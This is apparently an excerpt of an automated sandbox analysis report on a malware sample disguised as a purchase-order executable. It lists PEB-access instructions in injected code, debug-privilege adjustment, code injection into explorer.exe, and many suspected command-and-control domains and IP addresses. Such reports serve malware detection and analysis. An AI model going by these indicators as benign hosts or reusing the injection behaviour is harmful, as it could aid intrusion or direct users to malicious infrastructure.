Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395FAB0 mov eax, dword ptr fs:[00000030h] 17_2_0395FAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039252A5 mov eax, dword ptr fs:[00000030h] 17_2_039252A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952ACB mov eax, dword ptr fs:[00000030h] 17_2_03952ACB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952AE4 mov eax, dword ptr fs:[00000030h] 17_2_03952AE4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov eax, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov ecx, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov eax, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03925210 mov eax, dword ptr fs:[00000030h] 17_2_03925210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h] 17_2_0392AA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392AA16 mov eax, dword ptr fs:[00000030h] 17_2_0392AA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03943A1C mov eax, dword ptr fs:[00000030h] 17_2_03943A1C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03938A0A mov eax, dword ptr fs:[00000030h] 17_2_03938A0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h] 17_2_03964A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03964A2C mov eax, dword ptr fs:[00000030h] 17_2_03964A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EEA55 mov eax, dword ptr fs:[00000030h] 17_2_039EEA55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039B4257 mov eax, dword ptr fs:[00000030h] 17_2_039B4257
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929240 mov eax, dword ptr fs:[00000030h] 17_2_03929240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929240 mov eax, dword ptr fs:[00000030h] 17_2_03929240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929240 mov eax, dword ptr fs:[00000030h] 17_2_03929240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929240 mov eax, dword ptr fs:[00000030h] 17_2_03929240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0396927A mov eax, dword ptr fs:[00000030h] 17_2_0396927A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h] 17_2_039DB260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DB260 mov eax, dword ptr fs:[00000030h] 17_2_039DB260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8A62 mov eax, dword ptr fs:[00000030h] 17_2_039F8A62
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952990 mov eax, dword ptr fs:[00000030h] 17_2_03952990
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A185 mov eax, dword ptr fs:[00000030h] 17_2_0395A185
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C182 mov eax, dword ptr fs:[00000030h] 17_2_0394C182
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h] 17_2_039A51BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h] 17_2_039A51BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h] 17_2_039A51BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A51BE mov eax, dword ptr fs:[00000030h] 17_2_039A51BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h] 17_2_039561A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039561A0 mov eax, dword ptr fs:[00000030h] 17_2_039561A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A69A6 mov eax, dword ptr fs:[00000030h] 17_2_039A69A6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039B41E8 mov eax, dword ptr fs:[00000030h] 17_2_039B41E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 17_2_0392B1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 17_2_0392B1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B1E1 mov eax, dword ptr fs:[00000030h] 17_2_0392B1E1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929100 mov eax, dword ptr fs:[00000030h] 17_2_03929100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929100 mov eax, dword ptr fs:[00000030h] 17_2_03929100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929100 mov eax, dword ptr fs:[00000030h] 17_2_03929100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395513A mov eax, dword ptr fs:[00000030h] 17_2_0395513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395513A mov eax, dword ptr fs:[00000030h] 17_2_0395513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov eax, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov eax, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov eax, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov eax, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03944120 mov ecx, dword ptr fs:[00000030h] 17_2_03944120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h] 17_2_0394B944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394B944 mov eax, dword ptr fs:[00000030h] 17_2_0394B944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h] 17_2_0392B171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392B171 mov eax, dword ptr fs:[00000030h] 17_2_0392B171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C962 mov eax, dword ptr fs:[00000030h] 17_2_0392C962
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03929080 mov eax, dword ptr fs:[00000030h] 17_2_03929080
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h] 17_2_039A3884
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A3884 mov eax, dword ptr fs:[00000030h] 17_2_039A3884
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395F0BF mov ecx, dword ptr fs:[00000030h] 17_2_0395F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h] 17_2_0395F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395F0BF mov eax, dword ptr fs:[00000030h] 17_2_0395F0BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039520A0 mov eax, dword ptr fs:[00000030h] 17_2_039520A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039690AF mov eax, dword ptr fs:[00000030h] 17_2_039690AF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BB8D0 mov eax, dword ptr fs:[00000030h] 17_2_039BB8D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039258EC mov eax, dword ptr fs:[00000030h] 17_2_039258EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h] 17_2_039F4015
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F4015 mov eax, dword ptr fs:[00000030h] 17_2_039F4015
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h] 17_2_039A7016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h] 17_2_039A7016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7016 mov eax, dword ptr fs:[00000030h] 17_2_039A7016
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395002D mov eax, dword ptr fs:[00000030h] 17_2_0395002D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] 17_2_0393B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] 17_2_0393B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] 17_2_0393B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393B02A mov eax, dword ptr fs:[00000030h] 17_2_0393B02A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03940050 mov eax, dword ptr fs:[00000030h] 17_2_03940050
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03940050 mov eax, dword ptr fs:[00000030h] 17_2_03940050
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F1074 mov eax, dword ptr fs:[00000030h] 17_2_039F1074
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E2073 mov eax, dword ptr fs:[00000030h] 17_2_039E2073
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03938794 mov eax, dword ptr fs:[00000030h] 17_2_03938794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h] 17_2_039A7794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h] 17_2_039A7794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A7794 mov eax, dword ptr fs:[00000030h] 17_2_039A7794
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039637F5 mov eax, dword ptr fs:[00000030h] 17_2_039637F5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394F716 mov eax, dword ptr fs:[00000030h] 17_2_0394F716
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h] 17_2_039BFF10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BFF10 mov eax, dword ptr fs:[00000030h] 17_2_039BFF10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F070D mov eax, dword ptr fs:[00000030h] 17_2_039F070D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F070D mov eax, dword ptr fs:[00000030h] 17_2_039F070D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h] 17_2_0395A70E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A70E mov eax, dword ptr fs:[00000030h] 17_2_0395A70E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395E730 mov eax, dword ptr fs:[00000030h] 17_2_0395E730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h] 17_2_03924F2E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03924F2E mov eax, dword ptr fs:[00000030h] 17_2_03924F2E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393EF40 mov eax, dword ptr fs:[00000030h] 17_2_0393EF40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393FF60 mov eax, dword ptr fs:[00000030h] 17_2_0393FF60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8F6A mov eax, dword ptr fs:[00000030h] 17_2_039F8F6A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039BFE87 mov eax, dword ptr fs:[00000030h] 17_2_039BFE87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 17_2_039F0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 17_2_039F0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F0EA5 mov eax, dword ptr fs:[00000030h] 17_2_039F0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A46A7 mov eax, dword ptr fs:[00000030h] 17_2_039A46A7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8ED6 mov eax, dword ptr fs:[00000030h] 17_2_039F8ED6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03968EC7 mov eax, dword ptr fs:[00000030h] 17_2_03968EC7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039536CC mov eax, dword ptr fs:[00000030h] 17_2_039536CC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DFEC0 mov eax, dword ptr fs:[00000030h] 17_2_039DFEC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039376E2 mov eax, dword ptr fs:[00000030h] 17_2_039376E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039516E0 mov ecx, dword ptr fs:[00000030h] 17_2_039516E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h] 17_2_0395A61C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395A61C mov eax, dword ptr fs:[00000030h] 17_2_0395A61C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h] 17_2_0392C600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h] 17_2_0392C600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392C600 mov eax, dword ptr fs:[00000030h] 17_2_0392C600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03958E00 mov eax, dword ptr fs:[00000030h] 17_2_03958E00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039E1608 mov eax, dword ptr fs:[00000030h] 17_2_039E1608
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039DFE3F mov eax, dword ptr fs:[00000030h] 17_2_039DFE3F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392E620 mov eax, dword ptr fs:[00000030h] 17_2_0392E620
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03937E41 mov eax, dword ptr fs:[00000030h] 17_2_03937E41
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h] 17_2_039EAE44
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EAE44 mov eax, dword ptr fs:[00000030h] 17_2_039EAE44
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394AE73 mov eax, dword ptr fs:[00000030h] 17_2_0394AE73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393766D mov eax, dword ptr fs:[00000030h] 17_2_0393766D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h] 17_2_0395FD9B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0395FD9B mov eax, dword ptr fs:[00000030h] 17_2_0395FD9B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03952581 mov eax, dword ptr fs:[00000030h] 17_2_03952581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03922D8A mov eax, dword ptr fs:[00000030h] 17_2_03922D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h] 17_2_03951DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h] 17_2_03951DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03951DB5 mov eax, dword ptr fs:[00000030h] 17_2_03951DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h] 17_2_039F05AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F05AC mov eax, dword ptr fs:[00000030h] 17_2_039F05AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039535A1 mov eax, dword ptr fs:[00000030h] 17_2_039535A1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov ecx, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A6DC9 mov eax, dword ptr fs:[00000030h] 17_2_039A6DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039D8DF1 mov eax, dword ptr fs:[00000030h] 17_2_039D8DF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h] 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393D5E0 mov eax, dword ptr fs:[00000030h] 17_2_0393D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 17_2_039EFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 17_2_039EFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 17_2_039EFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EFDE2 mov eax, dword ptr fs:[00000030h] 17_2_039EFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0392AD30 mov eax, dword ptr fs:[00000030h] 17_2_0392AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03933D34 mov eax, dword ptr fs:[00000030h] 17_2_03933D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039EE539 mov eax, dword ptr fs:[00000030h] 17_2_039EE539
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8D34 mov eax, dword ptr fs:[00000030h] 17_2_039F8D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039AA537 mov eax, dword ptr fs:[00000030h] 17_2_039AA537
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03954D3B mov eax, dword ptr fs:[00000030h] 17_2_03954D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03947D50 mov eax, dword ptr fs:[00000030h] 17_2_03947D50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_03963D43 mov eax, dword ptr fs:[00000030h] 17_2_03963D43
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039A3540 mov eax, dword ptr fs:[00000030h] 17_2_039A3540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h] 17_2_0394C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0394C577 mov eax, dword ptr fs:[00000030h] 17_2_0394C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0393849B mov eax, dword ptr fs:[00000030h] 17_2_0393849B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_039F8CD6 mov eax, dword ptr fs:[00000030h] 17_2_039F8CD6
Enables debug privileges
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.bookitstaugustine.com
Source: C:\Windows\explorer.exe Network Connect: 166.62.28.107 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.hepimizdostuz.com
Source: C:\Windows\explorer.exe Network Connect: 154.210.110.99 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.szmsbk.com
Source: C:\Windows\explorer.exe Domain query: www.merkuryindustries.com
Source: C:\Windows\explorer.exe Domain query: www.pradnyanamaya.com
Source: C:\Windows\explorer.exe Domain query: www.hnchotels.com
Source: C:\Windows\explorer.exe Network Connect: 123.31.43.181 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.132.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.accessibleageing.com
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.88.57.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thelandcle.com
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.beyju.store
Source: C:\Windows\explorer.exe Domain query: www.theskineditco.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.199.108.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.17.172.1 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tuyensinhhaiphong.com
Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.belatopapparel.xyz
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
